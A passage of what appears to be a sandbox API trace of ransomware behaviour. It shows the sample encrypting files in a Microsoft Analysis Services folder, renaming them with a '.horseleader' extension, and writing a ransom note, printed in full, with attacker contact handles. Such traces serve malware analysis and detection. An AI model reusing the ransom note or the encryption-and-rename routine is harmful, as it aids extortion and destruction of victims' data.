liDistanceToMove=0xffffcae4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.106] WriteFile (in: hFile=0x1a4, 
lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x351c, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x351c, lpOverlapped=0x0) returned 1 [0252.106] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.106] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0252.106] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0252.107] CloseHandle (hObject=0x1a4) returned 1 [0252.107] GetProcessHeap () returned 0x780000 [0252.107] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0252.107] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl.horseleader") returned 95 [0252.107] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl.horseleader" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl.horseleader")) returned 1 [0252.108] GetProcessHeap () returned 0x780000 [0252.108] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0252.108] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, 
ftCreationTime.dwLowDateTime=0xa8ce7000, ftCreationTime.dwHighDateTime=0x1c9b00b, ftLastAccessTime.dwLowDateTime=0x5edefe10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa8ce7000, ftLastWriteTime.dwHighDateTime=0x1c9b00b, nFileSizeHigh=0x0, nFileSizeLow=0x7d92, dwReserved0=0x780150, dwReserved1=0xfbc691b5, cFileName="sql70.xsl", cAlternateFileName="")) returned 1 [0252.108] lstrcmpiW (lpString1="sql70.xsl", lpString2="Windows") returned -1 [0252.108] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 81 [0252.108] StrStrIW (lpFirst="sql70.xsl", lpSrch=".horseleader") returned 0x0 [0252.108] lstrcmpW (lpString1="sql70.xsl", lpString2="#Decrypt#.txt") returned 1 [0252.108] lstrcmpW (lpString1="sql70.xsl", lpString2="_uninstalling_.png") returned 1 [0252.108] lstrlenW (lpString=".testttjffg") returned 11 [0252.108] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl", lpSrch=".testttjffg") returned 0x0 [0252.108] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0252.109] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0252.109] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0252.110] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 81 [0252.110] StrStrW 
(lpFirst="sql70.xsl", lpSrch=".txt") returned 0x0 [0252.110] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=32146) returned 1 [0252.110] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0252.114] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.114] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0252.114] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x2d92, lpOverlapped=0x0) returned 1 [0252.115] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffd26e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.115] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x2d92, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x2d92, lpOverlapped=0x0) returned 1 [0252.115] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.115] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0252.115] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, 
lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0252.115] CloseHandle (hObject=0x1a4) returned 1 [0252.116] GetProcessHeap () returned 0x780000 [0252.116] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0252.116] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl.horseleader") returned 93 [0252.116] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl.horseleader" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl.horseleader")) returned 1 [0252.117] GetProcessHeap () returned 0x780000 [0252.117] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0252.117] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ce7000, ftCreationTime.dwHighDateTime=0x1c9b00b, ftLastAccessTime.dwLowDateTime=0x51552c10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa8ce7000, ftLastWriteTime.dwHighDateTime=0x1c9b00b, nFileSizeHigh=0x0, nFileSizeLow=0x9a5b, dwReserved0=0x780150, dwReserved1=0xfbc691b5, cFileName="sql90.xsl", cAlternateFileName="")) returned 1 [0252.117] lstrcmpiW (lpString1="sql90.xsl", lpString2="Windows") returned -1 [0252.117] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 81 [0252.117] StrStrIW (lpFirst="sql90.xsl", lpSrch=".horseleader") returned 0x0 [0252.117] lstrcmpW 
(lpString1="sql90.xsl", lpString2="#Decrypt#.txt") returned 1 [0252.117] lstrcmpW (lpString1="sql90.xsl", lpString2="_uninstalling_.png") returned 1 [0252.117] lstrlenW (lpString=".testttjffg") returned 11 [0252.117] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl", lpSrch=".testttjffg") returned 0x0 [0252.117] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0252.117] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0252.117] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0252.118] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 81 [0252.118] StrStrW (lpFirst="sql90.xsl", lpSrch=".txt") returned 0x0 [0252.118] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=39515) returned 1 [0252.118] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0252.121] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.121] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, 
lpOverlapped=0x0) returned 1 [0252.121] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x4a5b, lpOverlapped=0x0) returned 1 [0252.122] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb5a5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.122] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x4a5b, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x4a5b, lpOverlapped=0x0) returned 1 [0252.122] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.122] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0252.122] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0252.122] CloseHandle (hObject=0x1a4) returned 1 [0252.122] GetProcessHeap () returned 0x780000 [0252.122] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0252.122] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl.horseleader") returned 93 [0252.123] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS 
OLEDB\\10\\Cartridges\\sql90.xsl.horseleader" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl.horseleader")) returned 1 [0252.123] GetProcessHeap () returned 0x780000 [0252.123] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0252.123] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa81fdc00, ftCreationTime.dwHighDateTime=0x1c8dd0e, ftLastAccessTime.dwLowDateTime=0x5edefe10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa81fdc00, ftLastWriteTime.dwHighDateTime=0x1c8dd0e, nFileSizeHigh=0x0, nFileSizeLow=0x745e, dwReserved0=0x780150, dwReserved1=0xfbc691b5, cFileName="Sybase.xsl", cAlternateFileName="")) returned 1 [0252.124] lstrcmpiW (lpString1="Sybase.xsl", lpString2="Windows") returned -1 [0252.124] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 82 [0252.124] StrStrIW (lpFirst="Sybase.xsl", lpSrch=".horseleader") returned 0x0 [0252.124] lstrcmpW (lpString1="Sybase.xsl", lpString2="#Decrypt#.txt") returned 1 [0252.124] lstrcmpW (lpString1="Sybase.xsl", lpString2="_uninstalling_.png") returned 1 [0252.124] lstrlenW (lpString=".testttjffg") returned 11 [0252.124] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl", lpSrch=".testttjffg") returned 0x0 [0252.124] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0252.124] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0252.124] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis 
Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0252.126] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 82 [0252.126] StrStrW (lpFirst="Sybase.xsl", lpSrch=".txt") returned 0x0 [0252.126] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=29790) returned 1 [0252.126] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0252.129] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.129] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0252.129] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x245e, lpOverlapped=0x0) returned 1 [0252.130] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffdba2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.130] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x245e, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x245e, lpOverlapped=0x0) returned 1 [0252.130] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.130] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0252.130] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0252.130] CloseHandle (hObject=0x1a4) returned 1 [0252.130] GetProcessHeap () returned 0x780000 [0252.130] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0252.130] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl.horseleader") returned 94 [0252.131] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl.horseleader" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl.horseleader")) returned 1 [0252.132] GetProcessHeap () returned 0x780000 [0252.132] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0252.132] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa81fdc00, ftCreationTime.dwHighDateTime=0x1c8dd0e, ftLastAccessTime.dwLowDateTime=0x5edefe10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa81fdc00, ftLastWriteTime.dwHighDateTime=0x1c8dd0e, nFileSizeHigh=0x0, nFileSizeLow=0x745e, dwReserved0=0x780150, 
dwReserved1=0xfbc691b5, cFileName="Sybase.xsl", cAlternateFileName="")) returned 0 [0252.132] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0252.132] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\#Decrypt#.txt") returned 85 [0252.132] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\#Decrypt#.txt" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.132] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0252.132] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0252.134] lstrlenA (lpString="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") returned 1368 [0252.134] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0252.134] CloseHandle (hObject=0x158) returned 1 [0252.134] GetProcessHeap () returned 0x780000 [0252.134] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.134] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3cf6c00, ftCreationTime.dwHighDateTime=0x1ca2caa, ftLastAccessTime.dwLowDateTime=0x5f005150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf3cf6c00, ftLastWriteTime.dwHighDateTime=0x1ca2caa, nFileSizeHigh=0x0, nFileSizeLow=0x2a65d68, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="msmdlocal.dll", cAlternateFileName="MSMDLO~1.DLL")) returned 1 [0252.134] lstrcmpiW (lpString1="msmdlocal.dll", lpString2="Windows") returned -1 [0252.134] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll") returned 74 [0252.134] StrStrIW (lpFirst="msmdlocal.dll", lpSrch=".horseleader") returned 0x0 [0252.134] lstrcmpW (lpString1="msmdlocal.dll", lpString2="#Decrypt#.txt") returned 1 [0252.134] lstrcmpW (lpString1="msmdlocal.dll", lpString2="_uninstalling_.png") returned 1 [0252.134] lstrlenW (lpString=".testttjffg") returned 11 [0252.134] StrStrW (lpFirst="\\\\?\\C:\\Program 
Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll", lpSrch=".testttjffg") returned 0x0 [0252.134] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.134] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.135] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msmdlocal.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.135] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll") returned 74 [0252.135] StrStrW (lpFirst="msmdlocal.dll", lpSrch=".txt") returned 0x0 [0252.135] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=44457320) returned 1 [0252.135] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.135] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.139] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.140] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.140] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x15306b4, lpNewFilePointer=0x0, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.140] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.143] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.143] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.143] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x2a60d68, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.143] ReadFile 